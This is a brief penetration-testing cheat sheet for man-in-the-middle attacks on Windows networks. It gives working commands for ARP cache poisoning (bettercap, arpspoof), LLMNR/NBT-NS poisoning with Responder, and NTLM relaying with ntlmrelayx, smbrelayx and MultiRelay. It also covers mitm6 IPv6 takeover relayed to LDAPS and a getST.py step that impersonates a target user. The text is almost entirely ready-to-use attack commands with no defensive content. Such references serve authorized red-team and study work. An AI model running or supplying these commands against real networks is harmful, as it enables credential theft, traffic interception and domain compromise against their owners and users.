# Man-in-the-Middle

## ARP Cache Poisoning

Bettercap2

```
arp.spoof on
```

Arpspoof

```
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1
```

## LLMNR/NBT-NS Poisoning and SMB Relay

### Responder

Remember to start with

```
SMB = Off     # Turn this off
HTTP = Off    # Turn this off
```

```
responder -I eth0 -rv
```

```
responder -I eth0 -r -d -w
```

### Relay

#### ntlmrelayx

```
cme smb <CIDR> --gen-relay-list targets.txt
```

```
ntlmrelayx.py -tf targets.txt
```

#### smbrelayx

```
smbrelayx.py -h <target_IP> -c "ipconfig"
```

#### MultiRelay

```
python MultiRelay.py -t <IP target> -u ALL
```

### mitm6

```
mitm6 -d example.local --ignore-nofqdn
```

Relay

```
ntlmrelayx.py -6 -t ldaps://example.local --delegate-access --no-smb-server -wh test-wpad
```

Exploit

```
getST.py -spn cifs/example.local example.local/ADDED_PC\$ -impersonate TARGET_USER
```

### InveighZero

Works from Windows systems:

* <https://github.com/Kevin-Robertson/InveighZero>